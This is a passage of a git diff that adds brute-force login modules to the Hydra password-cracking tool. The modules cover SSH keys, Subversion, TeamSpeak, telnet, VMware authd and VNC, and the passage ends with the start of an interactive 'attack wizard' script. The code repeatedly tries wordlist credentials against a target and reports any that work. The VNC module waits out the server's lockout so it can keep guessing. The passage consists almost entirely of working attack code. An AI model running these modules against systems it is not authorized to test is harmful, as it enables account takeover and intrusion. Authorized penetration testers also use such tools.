== SSH_AUTH_ERROR) { + return 3; + } else if (rc == SSH_AUTH_SUCCESS) { + hydra_report_found_host(port, ip, "sshkey", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + else + return 1; + } + } else + new_session = 1; + + auth_state = ssh_auth_list(session); + if ((auth_state & SSH_AUTH_METHOD_PUBLICKEY) > 0) { + privkey = privatekey_from_file(session, key, 0, NULL); + if (!privkey) { + hydra_report(stderr, "[ERROR] skipping invalid private key: \"%s\"\n", key); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + + return 1; + } + auth_state = ssh_userauth_pubkey(session, NULL, NULL, privkey); + } else { + return 4; + } + + if (auth_state == SSH_AUTH_ERROR) { + new_session = 1; + return 1; + } + + if (auth_state == SSH_AUTH_SUCCESS || auth_state == SSH_AUTH_PARTIAL) { + hydra_report_found_host(port, ip, "sshkey", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + return 1; + } else { + strncpy(keep_login, login, sizeof(keep_login) - 1); + keep_login[sizeof(keep_login) - 1] = '\0'; + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + login = hydra_get_next_login(); + if (strcmp(login, keep_login) == 0) + new_session = 0; + return 1; + } + + /* not reached */ + return 1; +} + +void service_sshkey(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + next_run = start_sshkey(sock, ip, port, options, miscptr, fp); + break; + case 2: + ssh_disconnect(session); + ssh_finalize(); + ssh_free(session); + hydra_child_exit(0); + case 3: + ssh_disconnect(session); + ssh_finalize(); + ssh_free(session); + fprintf(stderr, "[ERROR] ssh protocol error\n"); + hydra_child_exit(2); + case 4: + ssh_disconnect(session); + ssh_finalize(); + ssh_free(session); + fprintf(stderr, "[ERROR] ssh target does not support pubkey auth\n"); + hydra_child_exit(2); + default: + ssh_disconnect(session); + ssh_finalize(); + ssh_free(session); + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} +#else +#error "You are not using v0.4.x. Download from http://www.libssh.org and add -DWITH_SSH1=On in cmake to enable SSH v1 support" +#endif +#endif + +int service_sshkey_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-svn.c b/hydra-svn.c new file mode 100644 index 0000000..3ab7900 --- /dev/null +++ b/hydra-svn.c @@ -0,0 +1,206 @@ +//This plugin was written by +//checked for memleaks on 110425, none found + +#ifdef LIBSVN + +/* needed on openSUSE */ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#endif + +#include "hydra-mod.h" + +#ifndef LIBSVN +void dummy_svn() { + printf("\n"); +} +#else + +extern int hydra_data_ready_timed(int socket, long sec, long usec); + +extern char *HYDRA_EXIT; + +#define DEFAULT_BRANCH "trunk" + +static svn_error_t *print_dirdummy(void *baton, const char *path, const svn_dirent_t * dirent, const svn_lock_t * lock, const char *abs_path, apr_pool_t * pool) { + return SVN_NO_ERROR; +} + +static svn_error_t *my_simple_prompt_callback(svn_auth_cred_simple_t ** cred, void *baton, const char *realm, const char *username, svn_boolean_t may_save, apr_pool_t * pool) { + char *empty = ""; + char *login, *pass; + svn_auth_cred_simple_t *ret = apr_pcalloc(pool, sizeof(*ret)); + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + ret->username = apr_pstrdup(pool, login); + ret->password = apr_pstrdup(pool, pass); + + *cred = ret; + return SVN_NO_ERROR; +} + +int start_svn(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + int ipv6 = 0; + char URL[1024]; + char URLBRANCH[256]; + apr_pool_t *pool; + svn_error_t *err; + svn_opt_revision_t revision; + apr_uint32_t dirents; + svn_client_ctx_t *ctx; + svn_auth_provider_object_t *provider; + apr_array_header_t *providers; + + if (miscptr) + strncpy(URLBRANCH, miscptr, sizeof(URLBRANCH)); + else + strncpy(URLBRANCH, DEFAULT_BRANCH, sizeof(URLBRANCH)); + + if (svn_cmdline_init("hydra", stderr) != EXIT_SUCCESS) + return 4; + + if (ip[0] == 16) + ipv6 = 1; + + pool = svn_pool_create(NULL); + + err = svn_config_ensure(NULL, pool); + if (err) { + svn_handle_error2(err, stderr, FALSE, "hydra: "); + return 4; + } + + if ((err = svn_client_create_context(&ctx, pool))) { + svn_handle_error2(err, stderr, FALSE, "hydra: "); + return 4; + } + + if ((err = svn_config_get_config(&(ctx->config), NULL, pool))) { + svn_handle_error2(err, stderr, FALSE, "hydra: "); + return 4; + } + + providers = apr_array_make(pool, 1, sizeof(svn_auth_provider_object_t *)); + + svn_auth_get_simple_prompt_provider(&provider, my_simple_prompt_callback, NULL, /* baton */ + 0, pool); + APR_ARRAY_PUSH(providers, svn_auth_provider_object_t *) = provider; + + /* Register the auth-providers into the context's auth_baton. */ + svn_auth_open(&ctx->auth_baton, providers, pool); + + revision.kind = svn_opt_revision_head; + if (ipv6) + snprintf(URL, sizeof(URL), "svn://[%s]:%d/%s", hydra_address2string(ip), port, URLBRANCH); + else + snprintf(URL, sizeof(URL), "svn://%s:%d/%s", hydra_address2string(ip), port, URLBRANCH); + dirents = SVN_DIRENT_KIND; + err = svn_client_list2(URL, &revision, &revision, svn_depth_unknown, dirents, FALSE, print_dirdummy, NULL, ctx, pool); + + svn_pool_clear(pool); + svn_pool_destroy(pool); + + if (err) { + if (verbose) + hydra_report(stderr, "[ERROR] Access refused (error code %d) , message: %s\n", err->apr_err, err->message); + //Username not found 170001 ": Username not found" + //Password incorrect 170001 ": Password incorrect" + if (err->apr_err != 170001) { + return 4; //error + } else { + if (strstr(err->message, "Username not found")) { + hydra_completed_pair_skip(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + } else { + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + } + } + } else { + if (verbose) + hydra_report(stderr, "[VERBOSE] Access granted\n"); + hydra_report_found_host(port, ip, "svn", fp); + hydra_completed_pair_found(); + return 3; + } + return 3; +} + +void service_svn(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_SVN, mysslport = PORT_SVN_SSL; + + hydra_register_socket(sp); + + while (1) { + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); + +// usleep(300000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + + next_run = 2; + break; + case 2: + next_run = start_svn(sock, ip, port, options, miscptr, fp); + break; + case 3: + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + if (!verbose) + hydra_report(stderr, "[ERROR] Caught unknown return code, try verbose option for more details\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +#endif + +int service_svn_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-teamspeak.c b/hydra-teamspeak.c new file mode 100644 index 0000000..1ca9685 --- /dev/null +++ b/hydra-teamspeak.c @@ -0,0 +1,141 @@ +#include "hydra-mod.h" +#include "crc32.h" + +/* + +This module brings support for Teamspeak version 2.x (TS2 protocol) +Tested with version 2.0.r23.b19, server uses to ban ip for 10 min +when bruteforce is detected. + +TS1 protocol (tcp/8765) is not supported +TS3 protocol (udp/9987) is not needed as user/pass is not used anymore + +*/ + +struct team_speak { + char header[16]; + unsigned long crc; + char clientlen; + char client[29]; + char oslen; + char os[29]; + char misc[10]; + char userlen; + char user[29]; + char passlen; + char pass[29]; + char loginlen; + char login[29]; +}; + +extern int hydra_data_ready_timed(int socket, long sec, long usec); + +extern char *HYDRA_EXIT; +char *buf; + +int start_teamspeak(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass; + char buf[100]; + struct team_speak teamspeak; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + memset(&teamspeak, 0, sizeof(struct team_speak)); + + memcpy(&teamspeak.header, "\xf4\xbe\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00", 16); + + teamspeak.clientlen = 9; + strcpy((char *) &teamspeak.client, "TeamSpeak"); + + teamspeak.oslen = 11; + strcpy((char *) &teamspeak.os, "Linux 2.6.9"); + + memcpy(&teamspeak.misc, "\x02\x00\x00\x00\x20\x00\x3c\x00\x01\x02", 10); + + teamspeak.userlen = strlen(login); + strncpy((char *) &teamspeak.user, login, 29); + + teamspeak.passlen = strlen(pass); + strncpy((char *) &teamspeak.pass, pass, 29); + + teamspeak.loginlen = 0; + strcpy((char *) &teamspeak.login, ""); + + teamspeak.crc = crc32(&teamspeak, sizeof(struct team_speak)); + + if (hydra_send(s, (char *) &teamspeak, sizeof(struct team_speak), 0) < 0) { + return 3; + } + + if (hydra_data_ready_timed(s, 5, 0) > 0) { + hydra_recv(s, (char *) buf, sizeof(buf)); + if (buf[0x58] == 1) { + hydra_report_found_host(port, ip, "teamspeak", fp); + hydra_completed_pair_found(); + } + } + + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + + return 1; +} + +void service_teamspeak(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_TEAMSPEAK; + + hydra_register_socket(sp); + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + run = 3; + + while (1) { + switch (run) { + case 1: /* connect and service init function */ +// if (sock >= 0) +// sock = hydra_disconnect(sock); +// usleep(300000); + if (sock < 0) { + if (port != 0) + myport = port; + sock = hydra_connect_udp(ip, myport); + port = myport; + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + } + next_run = start_teamspeak(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_teamspeak_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-telnet.c b/hydra-telnet.c new file mode 100644 index 0000000..069046b --- /dev/null +++ b/hydra-telnet.c @@ -0,0 +1,219 @@ +#include "hydra-mod.h" +#include + +extern char *HYDRA_EXIT; +char *buf; +int no_line_mode; + +int start_telnet(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[300]; + int i = 0; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + sprintf(buffer, "%.250s\r", login); + + if (no_line_mode) { + for (i = 0; i < strlen(buffer); i++) { + if (strcmp(&buffer[i], "\r") == 0) { + send(s, "\r\0", 2, 0); + } else { + send(s, &buffer[i], 1, 0); + } + usleep(20000); + } + } else { + if (hydra_send(s, buffer, strlen(buffer) + 1, 0) < 0) { + return 1; + } + } + + do { + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + + if (index(buf, '/') != NULL || index(buf, '>') != NULL || index(buf, '%') != NULL || index(buf, '$') != NULL || index(buf, '#') != NULL || index(buf, '%') != NULL) { + hydra_report_found_host(port, ip, "telnet", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + (void) make_to_lower(buf); + + if (hydra_strcasestr(buf, "asswor") != NULL || hydra_strcasestr(buf, "asscode") != NULL || hydra_strcasestr(buf, "ennwort") != NULL) + i = 1; + if (i == 0 && ((strstr(buf, "ogin:") != NULL && strstr(buf, "last login") == NULL) || strstr(buf, "sername:") != NULL)) { + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 2; + } + free(buf); + } while (i == 0); + + sprintf(buffer, "%.250s\r", pass); + if (no_line_mode) { + for (i = 0; i < strlen(buffer); i++) { + if (strcmp(&buffer[i], "\r") == 0) { + send(s, "\r\0", 2, 0); + } else { + send(s, &buffer[i], 1, 0); + } + usleep(20000); + } + } else { + if (hydra_send(s, buffer, strlen(buffer) + 1, 0) < 0) { + return 1; + } + } + + /*win7 answering with do terminal type = 0xfd 0x18 */ + while ((buf = hydra_receive_line(s)) != NULL && make_to_lower(buf) && (strstr(buf, "login:") == NULL || strstr(buf, "last login:") != NULL) && strstr(buf, "sername:") == NULL) { + if ((miscptr != NULL && strstr(buf, miscptr) != NULL) + || (miscptr == NULL + && (index(buf, '/') != NULL || index(buf, '>') != NULL || index(buf, '%') != NULL || index(buf, '$') != NULL || index(buf, '#') != NULL + || (strstr(buf, " failed") == NULL && index(buf, '%') != NULL) || ((buf[1] == '\xfd') && (buf[2] == '\x18'))))) { + hydra_report_found_host(port, ip, "telnet", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + free(buf); + } + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 2; +} + +void service_telnet(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_TELNET, mysslport = PORT_TELNET_SSL; + int fck = 0; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + if (miscptr != NULL) + make_to_lower(miscptr); + while (1) { + int first = 0; + int old_waittime = waittime; + + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(300000); + no_line_mode = 0; + first = 0; + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + if ((buf = hydra_receive_line(sock)) == NULL) { /* check the first line */ + hydra_report(stderr, "[ERROR] Not a TELNET protocol or service shutdown\n"); + hydra_child_exit(2); +// hydra_child_exit(2); + } + if (hydra_strcasestr(buf, "ress ENTER") != NULL) { + hydra_send(sock, "\r\n", 2, 0); + free(buf); + if ((buf = hydra_receive_line(sock)) == NULL) { + hydra_report(stderr, "[ERROR] Not a TELNET protocol or service shutdown\n"); + hydra_child_exit(2); + } + } + if (hydra_strcasestr(buf, "login") != NULL || hydra_strcasestr(buf, "sername:") != NULL) { + waittime = 6; + if (debug) + hydra_report(stdout, "DEBUG: waittime set to %d\n", waittime); + } + do { + unsigned char *buf2 = (unsigned char *) buf; + + while (*buf2 == IAC) { + if (first == 0) { + if (debug) + hydra_report(stdout, "DEBUG: requested line mode\n"); + fck = write(sock, "\xff\xfb\x22", 3); + first = 1; + } + if ((buf[1] == '\xfc' || buf[1] == '\xfe') && buf2[2] == '\x22') { + no_line_mode = 1; + if (debug) + hydra_report(stdout, "DEBUG: TELNETD peer does not like linemode!\n"); + } + if (buf2[2] != '\x22') { + if (buf2[1] == WILL || buf2[1] == WONT) { + buf2[1] = DONT; + } else if (buf2[1] == DO || buf2[1] == DONT) { + buf2[1] = WONT; + } + fck = write(sock, buf2, 3); + } + buf2 = buf2 + 3; + } + + if (buf2 != (unsigned char *) buf) { + free(buf); + buf = hydra_receive_line(sock); + } else { + buf[0] = 0; + } + if (buf != NULL && buf[0] != 0 && (unsigned char) buf[0] != IAC) + make_to_lower(buf); + } while (buf != NULL && (unsigned char) buf[0] == IAC && hydra_strcasestr(buf, "ogin:") == NULL && hydra_strcasestr(buf, "sername:") == NULL); + free(buf); + waittime = old_waittime; + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_telnet(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_telnet_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-vmauthd.c b/hydra-vmauthd.c new file mode 100644 index 0000000..5b0d38e --- /dev/null +++ b/hydra-vmauthd.c @@ -0,0 +1,157 @@ +//This plugin was written by david@ +// +//This plugin is written for VMware Authentication Daemon +// + +#include "hydra-mod.h" + + +extern char *HYDRA_EXIT; + +char *buf; + +int start_vmauthd(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = "\"\""; + char *login, *pass, buffer[300]; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + while (hydra_data_ready(s) > 0) { + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + free(buf); + } + + sprintf(buffer, "USER %.250s\r\n", login); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + if (strncmp(buf, "331 ", 4) != 0) { + hydra_report(stderr, "[ERROR] vmware authd protocol or service shutdown: %s\n", buf); + free(buf); + return (3); + } + free(buf); + + sprintf(buffer, "PASS %.250s\r\n", pass); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + +//fprintf(stderr, "%s\n", buf); +//230 User test logged in. +//530 Login incorrect. + + if (strncmp(buf, "230 ", 4) == 0) { + hydra_report_found_host(port, ip, "vmauthd", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + + return 2; +} + +void service_vmauthd(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_VMAUTHD, mysslport = PORT_VMAUTHD_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(300000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = myport; + } + + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + buf = hydra_receive_line(sock); +//fprintf(stderr, "%s\n",buf); +//220 VMware Authentication Daemon Version 1.00 +//220 VMware Authentication Daemon Version 1.10: SSL Required +//220 VMware Authentication Daemon Version 1.10: SSL Required, ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , + + if (buf == NULL || strstr(buf, "220 VMware Authentication Daemon Version ") == NULL) { + /* check the first line */ + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not an vmware authd protocol or service shutdown: %s\n", buf); + hydra_child_exit(2); + } + if ((strstr(buf, "Version 1.00") == NULL) && (strstr(buf, "Version 1.10") == NULL)) { + free(buf); + hydra_report(stderr, "[ERROR] this vmware authd protocol is not supported, please report: %s\n", buf); + hydra_child_exit(2); + } + //by default this service is waiting for ssl connections + if (strstr(buf, "SSL Required") != NULL) { + if ((options & OPTION_SSL) == 0) { + //reconnecting using SSL + if (hydra_connect_to_ssl(sock) == -1) { + free(buf); + hydra_report(stderr, "[ERROR] Can't use SSL\n"); + hydra_child_exit(2); + } + } + } + free(buf); + + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_vmauthd(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_vmauthd_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-vnc.c b/hydra-vnc.c new file mode 100644 index 0000000..b5c0fd7 --- /dev/null +++ b/hydra-vnc.c @@ -0,0 +1,244 @@ + +/* + * Tested against RealVNC P4.6.0 using 3.3 and 4.1 RFB + * proto with None and VLC auth (david@) + * + */ + +#include "hydra-mod.h" +#include "d3des.h" + +#define CHALLENGESIZE 16 + +//for RFB 003.003 & 003.005 +#define RFB33 1 +//for RFB 3.7 and onwards +#define RFB37 2 + +int vnc_client_version = RFB33; +int failed_auth = 0; + +extern char *HYDRA_EXIT; +char *buf; + +/* + * Encrypt CHALLENGESIZE bytes in memory using a password. + * Ripped from vncauth.c + */ + +void vncEncryptBytes(unsigned char *bytes, char *passwd) { + unsigned char key[8]; + int i; + + /* key is simply password padded with nulls */ + for (i = 0; i < 8; i++) { + if (i < strlen(passwd)) { + key[i] = passwd[i]; + } else { + key[i] = 0; + } + } + deskey(key, EN0); + for (i = 0; i < CHALLENGESIZE; i += 8) { + des(bytes + i, bytes + i); + } +} + +int start_vnc(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *pass; + unsigned char buf2[CHALLENGESIZE + 4]; + + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + recv(s, buf2, CHALLENGESIZE + 4, 0); + + if (vnc_client_version == RFB37) { + int i; + + //fprintf(stderr,"number of security types supported: %d\n", buf2[0]); + if (buf2[0] == 0) { + hydra_report(stderr, "[ERROR] VNC server connection failed\n"); + hydra_child_exit(0); + } + + for (i = 1; i <= buf2[0]; i++) { + //fprintf(stderr,"sec type %u\n",buf2[i]); + //check if weak security types are available + if (buf2[i] <= 0x2) { + buf2[3] = buf2[i]; + break; + } + } + } + //supported security type + switch (buf2[3]) { + case 0x0: + hydra_report(stderr, "[ERROR] VNC server told us to quit %c\n", buf[3]); + hydra_child_exit(0); + case 0x1: + hydra_report(fp, "VNC server does not require authentication.\n"); + if (fp != stdout) + hydra_report(stdout, "VNC server does not require authentication.\n"); + hydra_report_found_host(port, ip, "vnc", fp); + hydra_completed_pair_found(); + hydra_child_exit(2); + case 0x2: + //VNC security type supported is the only type supported for now + if (vnc_client_version == RFB37) { + sprintf(buf, "%c", 0x2); + if (hydra_send(s, buf, strlen(buf), 0) < 0) { + return 1; + } + //get authentication challenge from server + if (recv(s, buf2, CHALLENGESIZE, 0) == -1) + return 1; + //send response + vncEncryptBytes(buf2, pass); + if (hydra_send(s, (char *) buf2, CHALLENGESIZE, 0) < 0) { + return 1; + } + } else { + //in old proto, challenge is following the security type + vncEncryptBytes((unsigned char *) buf2 + 4, pass); + if (hydra_send(s, (char *) buf2 + 4, CHALLENGESIZE, 0) < 0) { + return 1; + } + } + break; + default: + hydra_report(stderr, "[ERROR] unknown VNC security type\n"); + hydra_child_exit(2); + } + + //check security result value + recv(s, buf, 4, 0); + if (buf == NULL) + return 1; + + switch (buf[3]) { + case 0x0: + hydra_report_found_host(port, ip, "vnc", fp); + hydra_completed_pair_found(); + free(buf); + failed_auth = 0; + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + case 0x1: + free(buf); + if (verbose) + hydra_report(stderr, "[VERBOSE] Authentication failed for password %s\n", pass); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + default: + free(buf); + hydra_report(stderr, "[ERROR] unknown VNC server security result %d\n", buf[3]); + return 1; + } + + return 1; /* never reached */ +} + +void service_vnc(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_VNC, mysslport = PORT_VNC_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + usleep(300000); + buf = hydra_receive_line(sock); + + if (buf == NULL || (strncmp(buf, "RFB", 3) != 0)) { /* check the first line */ + hydra_report(stderr, "[ERROR] Not a VNC protocol or service shutdown: %s\n", buf); + hydra_child_exit(2); + } + if (strstr(buf, " security failures") != NULL) { /* check the first line */ + /* + VNC has a 'blacklisting' scheme that blocks an IP address after five unsuccessful connection attempts. + The IP address is initially blocked for ten seconds, + but this doubles for each unsuccessful attempt thereafter. + A successful connection from an IP address resets the blacklist timeout. + This is built in to VNC Server and does not rely on operating system support. + */ + failed_auth++; + hydra_report(stderr, "VNC server reported too many authentication failures, have to wait some seconds ...\n"); + sleep(12 * failed_auth); + free(buf); + next_run = 1; + break; + } + if (verbose) + hydra_report(stderr, "[VERBOSE] Server banner is %s\n", buf); + if (((strstr(buf, "RFB 004.001") != NULL) || (strstr(buf, "RFB 003.007") != NULL) || (strstr(buf, "RFB 003.008") != NULL))) { + //using proto version 003.008 to talk to server 004.001 same for 3.7 and 3.8 + vnc_client_version = RFB37; + free(buf); + buf = strdup("RFB 003.007\n"); + } else { + //for RFB 3.3 and fake 3.5 + vnc_client_version = RFB33; + free(buf); + buf = strdup("RFB 003.003\n"); + } + hydra_send(sock, buf, strlen(buf), 0); + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_vnc(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + case 4: + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_vnc_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-wizard.sh b/hydra-wizard.sh new file mode 100755 index 0000000..0a7b221 --- /dev/null +++ b/hydra-wizard.sh @@ -0,0 +1,44 @@ +#!/bin/sh +# +# based on a script by Shivang Desai +# +echo +echo "Welcome to the Hydra Wizard" +echo +read -p "Enter the service to attack (eg: ftp, ssh, http-post-form): " service +test -z "$service" && { echo Error: service may not be empty ; exit 1 ; } +read -p "Enter the the target to attack (or filename with targets): " target +test -z "$target" && { echo Error: target may not be empty ; exit 1 ; } +read -p "Enter a username to test or a filename: " user +test -z "$user" && { echo Error: user may not be empty ; exit 1 ; } +read -p "Enter a password to test or a filename: " pass +test -z "$pass" && { echo Error: pass may not be empty ; exit 1 